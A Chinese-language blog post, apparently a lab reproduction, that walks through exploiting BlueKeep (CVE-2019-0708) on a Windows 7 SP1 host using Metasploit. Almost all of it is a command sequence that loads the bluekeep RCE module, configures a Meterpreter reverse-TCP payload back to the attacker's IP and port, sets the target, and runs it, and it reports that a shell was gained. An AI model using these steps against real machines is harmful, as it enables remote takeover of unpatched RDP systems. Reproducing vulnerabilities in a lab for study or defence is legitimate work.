CVE-2019-0708復現拿shell

把CVE-2019-0708的攻擊套件添加到metasploit中
添加教程

攻擊主機:192.168.10.128 目標主機:192.168.10.131 (win7 SP1)
打開msf,輸入reload_all命令

msf5 > reload_all               //加載腳本
msf5 > search cve-2019-0708    //搜索cve-2019-0708

在這裏插入圖片描述
在這裏插入圖片描述

#使用腳本
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce 
#設置監聽反彈payload
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set payload windows/x64/meterpreter/reverse_tcp
#設置監聽地址
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lhost 192.168.10.128
#設置監聽端口
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lport 4444


#設置目標ip
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rdp_client_ip 192.168.10.131     
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.10.131
#取消默認設置的名稱
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > unset RDP_CLIENT_NAME 
#設置目標類型,提高成功率
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 3
#查看攻擊腳本要設置的參數
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options

在這裏插入圖片描述
在這裏插入圖片描述

#開啓攻擊
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

成功獲取到shell
在這裏插入圖片描述

發佈了20 篇原創文章 · 獲贊 8 · 訪問量 3570
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章